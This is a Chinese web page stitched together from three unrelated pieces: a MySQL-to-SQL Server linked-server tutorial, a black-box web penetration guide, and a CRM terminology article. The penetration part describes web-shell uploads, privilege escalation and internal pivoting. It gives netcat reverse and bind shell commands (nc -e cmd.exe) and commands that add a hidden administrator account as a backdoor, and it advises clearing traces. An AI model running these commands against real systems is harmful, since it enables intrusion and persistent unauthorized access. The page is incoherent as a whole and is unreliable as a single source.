mql能导入sql server数据吗

当然可以了。

一.为 MySQL安装ODBC驱动

下载MySQL ODBC Connector，

从控制面板-管理工具，打开你的 数据源(ODBC)，选 系统DNS ,点添加。   　

在 创建新数据源对话框中，选择MySQL ODBC 5.1 Driver ，点完成。

完成后会出现MySQL 链接对话框，添加你的 MySQL 数据库账号信息，并确认"root"账号是否有全部的权限，如果你安装MySQL 没有修改的话， 不要改 3306这个端口号。

点“测试”按钮确认你的链接是正确的。 Press the "Test" button to ensure your connection settings are set properly and then the "OK" button when you're done.

二. 创建Microsoft SQL到MySQL的链接

1.在SQL Server Management Studio中打开一个new query 拷贝一下语句，修改为你的数据库的名称，并运行。 EXEC master.dbo.sp_addlinkedserver  @server = N'MYSQL',  @srvproduct=N'MySQL',  @provider=N'MSDASQL',  @provstr=N'DRIVER={MySQL ODBC 5.1 Driver}SERVER=localhost_  DATABASE=tigerdbUSER=rootPASSWORD=hejsanOPTION=3'

2.这个脚本通过ODBC驱动创建一个联接到你的MySQL数据库，这个联接出现在Microsoft SQL Server Management Studio如下图：  没有出现这个图，就刷新下。

三. 在两个数据库之间导数据

在Microsoft SQL Server中创建个新的数据库（如：testMySQl），在new query中拷贝如下语句，运行后就可以把MySQL 数据库 “tigerdb” 导入到 Microsoft SQL 数据库“testMySQl”中。  

SELECT * INTO testMySQL.dbo.shoutbox FROM openquery(MYSQL, 'SELECT * FROM tigerdb.shoutbox')

Web渗透测试分为白盒测试和黑盒测试，白盒测试是指目标网站的源码等信息的情况下对其渗透，相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透，以下所说的Web渗透就是黑盒渗透。

Web渗透分为以下几个步骤，信息收集，漏洞扫描，漏洞利用，提权，内网渗透，留后门，清理痕迹。一般的渗透思路就是看是否有注入漏洞，然后注入得到后台管理员账号密码，登录后台，上传小马，再通过小马上传大马，提权，内网转发，进行内网渗透，扫描内网c段存活主机及开放端口，看其主机有无可利用漏洞（nessus）端口（nmap）对应服务及可能存在的漏洞，对其利用（msf）拿下内网，留下后门，清理痕迹。或者看是否有上传文件的地方，上传一句话木马，再用菜刀链接，拿到数据库并可执行cmd命令，可继续上大马.........思路很多，很多时候成不成功可能就是一个思路的问题，技术可以不高，思路一定得骚。

信息收集

信息收集是整个流程的重中之重，前期信息收集的越多，Web渗透的成功率就越高。

DNS域名信息：通过url获取其真实ip,子域名(Layer子域名爆破机)，旁站(K8旁站，御剑1.5)，c段，网站负责人及其信息（whois查询）

整站信息：服务器 *** 作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型；

网站常见搭配为：

ASP和ASPX：ACCESS、SQLServer

PHP：MySQL、PostgreSQL

JSP：Oracle、MySQL

敏感目录信息（御剑，dirbust）

开放端口信息（nmp）

漏洞扫描

利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描，看其是否有可利用漏洞。

常见漏洞：

SQL注入

XSS跨站脚本

CSRF跨站请求伪造

XXE(XML外部实体注入)漏洞

SSRF(服务端请求伪造)漏洞

文件包含漏洞

文件上传漏洞

文件解析漏洞

远程代码执行漏洞

CORS跨域资源共享漏洞

越权访问漏洞

目录遍历漏洞和任意文件读取/下载漏洞

漏洞利用

用工具也好什么也好对相应漏洞进行利用

如：

Sql注入（sqlmap）

XSS（BEEF）

后台密码爆破（burp）

端口爆破（hydra）

提权

获得shell之后我们权限可能很低，因此要对自己提权，可以根据服务器版本对应的exp进行提权，对于Windows系统也可看其补丁对应漏洞的exp进行提权

内网渗透

首先进行端口转发可用nc

nc使用方法：

反向连接

在公网主机上进行监听：

nc-lvp 4444

在内网主机上执行：

nc-e cmd.exe 公网主机ip4444

成功之后即可得到一个内网主机shell

正向连接

远程主机上执行：

nc-l -p 4444 -t -e cmd.exe

本地主机上执行：

nc-vv 远程主机ip4444

成功后，本地主机即可远程主机的一个shell

然后就是对内网进行渗透了，可以用主机漏洞扫描工具（nessus,x-scan等）进行扫描看是否有可用漏洞，可用msf进行利用，或者用nmap扫描存活主机及开放端口，可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门

留后门

对于网站上传一句话木马，留下后门

对于windows用户可用hideadmin创建一个超级隐藏账户

手工：

netuser test$ 123456 /add

netlocalgroup administrators test$ /add

这样的话在cmd命令中看不到，但在控制面板可以看到，还需要改注册表才能实现控制版面也看不到，太过麻烦，不多赘述，所以还是用工具省心省力。

大家可能都知道CRM是Customer Relationship Management（客户关系管理）的缩写词，但这究竟意味着什么？事实上，仅知道CRM的全称和含义并不能帮助您窥其堂奥，在整个CRM体系中，还有一些少有人知的缩略词，这些专业术语和CRM系统所倡导的管理理念紧密相关，它们能够帮助您自下而上的理解CRM。为了帮助您赶上进度，我们创建了这个快速指南，不落俗套的向您解释这些专业术语的全称和实际意义。

一、CRM（Customer Relationship Management）

从字面意义上来看，CRM就是客户关系管理，但是对很多人来说，“关系管理”是一个很难理解的词（多义），比如我们举几个例子：

1、人情关系：你和一家饭店老板关系不错，经常到他店里吃饭，但是你并不认可饭菜的味道。

2、利益关系：你从没有见过另一家饭店的老板，但你会经常光顾他的饭店，只因为饭菜合你的胃口。

3、人脉关系：你知道一家饭店老板认识一个你想认识的人，所以你愿意去消费并与之相交。

其中第2个是就是CRM能够充分介入的层面，我们这里所指的Customer Relationship Management是指一个企业，通过让内部的管理流程、产品、销售和服务等环节与客户的喜好有关，从而与客户建立更好的关系。所以，CRM旨在帮助企业为客户创造价值，从而为企业带来价值。

这里有一篇可以让您轻松阅读的文章，只需要十分钟的时间，就可以让您对CRM有一个较为全面的认识。

知乎回答：如何理解 CRM 客户关系管理系统？

二、ABM（Account Based Marketing）

ABM是基于用户（账户）的营销方式，它其实是一种B2B策略，这个营销策略并非只针对单一的个人，而是采用不同的策略或销售活动来跟进某家公司的多个联系人。比如：

1、您会给采购人员准备一份报价方案，

2、给信息部经理准备一份安全性说明或技术解决方案，

3、给老板看的则可能是一个同行标杆客户的成功案例。

对不同的人采用不同的销售活动目的非常简单，就是提升贵公司在整个采购过程中的存在感和影响力，并最终拿下订单。基于账户的营销（ABM）是流量思维向用户思维的转变，它将销售和营销资源集中于一个明确定义的企业账户上，并根据其联系人角色采用个性化的（能被各个角色所认同的）营销策略。

三、MQL（Marketing Qualified Leads）

MQL是营销合格线索（或称市场验证线索），营销合格的潜在客户已显示出对产品的潜在兴趣，他们已迈出了购买流程的第一步。举个例子，比如您在知客CRM网站上找到了您感兴趣的内容，您愿意在我们网站上注册以便进一步了解我们的产品，对于我们来说，您就是一个MQL。

四、SAL（Sales Accepted Leads）

SAL是销售人员所能接受的线索，比如您在MQL阶段提交了注册信息，并且填写了一个看上去很真实的公司名称和联系信息，那么我们的销售人员会认为这可能是一个有效注册，从而安排时间尽快联系您，那么这时您就是一个SAL。或者，您主动给我们的售前顾问打电话咨询一些问题，这时，您也是一个SAL。

总之，SAL是MQL和SQL之间的桥梁。SAL是销售团队已同意跟进的潜在客户，但尚未与之交谈（或未进行深入沟通），暂时无法确定他们是否是合格的潜在客户。如果联系了SAL，且潜在客户表示有购买兴趣，则他们很可能会转换为SQL。

五、SQL（Sales Qualified Leads）

SQL是销售人员认为合格的潜在客户，销售合格潜在客户是销售人员已经联系和了解过的潜在客户，他们被认为已准备好进入销售流程的下一阶段。销售人员（通常）会在CRM中为SQL创建一个销售机会，当然，每个公司对于如何将MQL移至SQL的过程和准则略有不同。

六、SDR（Sales Development Rep）

SDR是销售开发人员，听上去和销售人员差不多，事实上，他们的职责应归属于市场部门。SDR只专注于线索挖掘，不负责签单，比如，SDR通过电话确认线索的有效性，并分类分级，然后将这些信息传递给销售人员。另外，要明确的是：SDR并不等同于电销，SDR的职责是输出有效线索，电销的任务是电话成交。

七、L2C（Leads to Cash）

L2C是线索（潜在客户）到现金的过程，结合以上专业术语，一个完整的L2C流程如下：线索Leads——营销合格线索MQL——销售接受线索SAL——销售验证线索SQL——进入CRM的销售漏斗（销售机会管理，一般来说要将整个销售过程分成5至7个阶段）——成交客户——续费客户。

要更加直观地了解L2C，您可以观看这个视频。

《知客CRM赢单指南：从新增客户到回款》

八、VOC（Voice Of the Customer）

VOC是一个在商业管理和CRM系统中使用的术语，用来捕获和描述客户的期望、偏好以及其所厌恶的事务。具体而言，客户声音的获取是一种市场调查手段，它产生客户需求的详细集合，组织成一个分层结构。客户声音数据（VOC Data）帮助企业更好地理解客户的偏好和需求，通常对企业在设计新产品、优化销售过程或售后服务时起到很大的作用。

您可以使用知客CRM的问卷调查功能获得详细的VOC数据。

《如何用知客CRM的调查表获得客户反馈》

九、CX（Customer Experience）

CX是客户体验，在消费者对营销信息免疫的市场中，客户体验从未如此重要。沃克咨询公司在其《Customer 2020》报告中指出，在短短两年的时间内，客户体验将成为购买决策中的最重要的指标，超过了产品和价格等因素。事实上，客户在与企业互动过程中的体验和满意度，决定了销售成功率和重复购买率，相对应的是，如果客户对企业满意度下降，则企业不止营收难以增长，还要面临客户流失的问题。

十、NPS（Net Promoter Score）

NPS的字面解释是净准荐值，是指向客户问一个简单的问题来揭示客户忠诚度：“从0到10分，您有多大可能把我们推荐给其他人？”每当客户回答这个问题时，根据预定义的标准对答案进行分段：

1、忠诚（9-10）：这些人热爱你的产品或服务，并且很可能把你推荐给潜在的买家。给您打9或10分的客户是重复消费客户，并且具有很高的客户终身价值。

2、被动（7-8）：那些给你打7或8分的人满足于成为你的客户，但如果他们找到更好的产品，他们很有可能转向你的竞争对手。

3、贬低（0-6）：这些人对你的产品或服务不满意，很可能通过与他们的朋友、家人和同事分享他们的负面经历而损害你的品牌声誉。

NPS调查的重要之处在于，它把客户集中在他们对你的产品和服务的整体体验上，而不仅仅是最近一次的遭遇，这对您为客户提供了什么样的服务给予了深刻理解。

结论

以上大多数术语并不会出现在CRM系统中，但它们对应了CRM的整个应用流程，也是企业进行数字化转型时所需要涉及到的概念。从营销到线索管理（MQL、SAL、SQL，SDR），从客户到销售管理（ABM、L2C)，从客户需求管理到客户体验（VOC、CX、NPS），这些术语构成了一个营销、销售、服务的闭环。我们学习这些专业的缩略语并不只是在提及它们的时候概述其全称，而是为了在未来的业务环节中引入这些优秀的管理理念提供契机。

---